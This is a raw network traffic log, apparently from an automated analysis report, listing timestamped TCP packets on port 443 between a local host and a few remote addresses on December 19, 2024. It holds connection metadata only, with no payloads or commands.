                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060189009 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060394049 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060405970 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060446024 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060672998 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060691118 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.060734034 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061297894 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061319113 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061481953 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061502934 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061675072 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061692953 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061883926 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.061901093 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.062503099 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.062515020 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.062805891 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.062820911 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.063775063 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.063822985 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.063838959 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.071691990 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.071732998 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.071748018 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.079870939 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.079920053 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.079932928 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.095823050 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.095859051 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.095880985 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.095901012 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.095942020 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.103662014 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.111679077 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.111728907 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.111746073 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.119647026 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.119714022 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.119730949 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.127670050 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.127722979 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.127734900 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.134664059 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.134711981 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.134726048 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.137084961 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.137181997 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.137263060 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.137470007 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.137502909 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.141674042 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.141722918 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.141937017 CET49740443192.168.2.4104.16.103.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.141958952 CET44349740104.16.103.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.319117069 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.319176912 CET44349750104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.319252968 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.319628000 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:20.319650888 CET44349750104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.276791096 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.277107000 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.277137995 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.278058052 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.278240919 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.278274059 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.278856993 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.278928995 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.279484034 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.279524088 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.279545069 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280011892 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280111074 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280147076 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280221939 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280289888 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280301094 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280438900 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280446053 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280522108 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280536890 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.280834913 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.281008959 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.281044006 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.281486988 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.281645060 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.281666040 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.281838894 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.281896114 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.282190084 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.282299995 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.282332897 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.283232927 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.283396006 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.283412933 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.283875942 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.283941984 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284214973 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284297943 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284303904 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284466028 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284518003 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284812927 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284881115 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.284890890 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.285152912 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.285211086 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.285481930 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.285566092 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.285566092 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.320216894 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.320220947 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.323339939 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.327334881 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.327336073 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.327349901 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335417986 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335421085 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335426092 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335447073 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335445881 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335463047 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335469961 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.335488081 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.381191015 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.381196976 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.381196976 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.381818056 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.394119024 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.396673918 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.396719933 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.398220062 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.398325920 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.398745060 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.398854017 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.399007082 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.443329096 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.444370031 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.444401979 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.490885019 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.533572912 CET44349750104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.533934116 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.533970118 CET44349750104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.534866095 CET44349750104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.534945011 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.536390066 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.536504984 CET44349750104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.536606073 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.536616087 CET44349750104.16.79.73192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.583982944 CET49750443192.168.2.4104.16.79.73
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.737481117 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.737600088 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.737657070 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.737688065 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.737693071 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.737735033 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.737747908 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.739989042 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.740056038 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.740061998 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.740075111 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.740122080 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.748503923 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.757025957 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.757129908 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.757225990 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.757225990 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760518074 CET49745443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760539055 CET44349745104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760751009 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760848045 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760895014 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760917902 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760931969 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760943890 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760968924 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.760987997 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.761064053 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.761509895 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.761552095 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.761569023 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.763911963 CET49751443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.763926029 CET44349751104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.769368887 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.769428968 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.769454002 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.777736902 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.777793884 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.777816057 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.789026022 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.789221048 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.789283037 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.789314985 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.789388895 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.789444923 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.789460897 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.797372103 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.797452927 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.797482014 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.797503948 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.797529936 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.797559977 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.797607899 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.814362049 CET49747443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.814388037 CET44349747104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.818043947 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.853965998 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.854211092 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.854274988 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.854285955 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.854317904 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.854363918 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.854450941 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.857764959 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.857940912 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.857975006 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.857985973 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.858016968 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.858059883 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.858299017 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.858643055 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.859170914 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.859217882 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.859239101 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.859357119 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.859406948 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.859415054 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.861759901 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.861802101 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.861809969 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.866381884 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.866437912 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.866447926 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.866977930 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867203951 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867275953 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867275953 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867332935 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867403984 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867419958 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867779016 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867820978 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.867836952 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.870054960 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.870105982 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.870114088 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.875073910 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.875128984 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.875138044 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.875387907 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.875451088 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.875468016 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.876133919 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.876182079 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.876199007 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.880203962 CET44349746104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.889539003 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.889610052 CET49749443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.889627934 CET44349749104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.922414064 CET49748443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.922439098 CET44349748104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.922447920 CET49743443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.922452927 CET44349743104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.922477007 CET49746443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.922477961 CET49744443192.168.2.4104.16.102.112
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.922552109 CET44349744104.16.102.112192.168.2.4
                                                                                                                                                                                                                                                    Dec 19, 2024 22:27:21.929667950 CET49749443192.168.2.4104.16.102.112
